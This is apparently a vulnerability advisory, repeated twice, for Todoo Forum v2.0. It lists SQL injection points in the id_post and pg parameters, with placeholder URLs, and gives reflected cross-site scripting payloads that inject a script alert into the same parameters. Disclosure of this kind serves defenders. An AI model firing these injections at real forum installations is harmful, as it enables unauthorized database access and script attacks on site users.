Title: Todoo Forum v2.0 - Multiple Vulnerabilities
Author: snake eye
Date:04-13-2013
Category:web applications
Verified:Verified
Affected version: v2.0
Platform:windows
Vendor:http://www.todoomasters.com/
[+] SQL Injection
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]
[+] Cross-site scripting
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>
Author: snake eye
Date:04-13-2013
Category:web applications
Verified:Verified
Affected version: v2.0
Platform:windows
Vendor:http://www.todoomasters.com/
[+] SQL Injection
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]
[+] Cross-site scripting
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information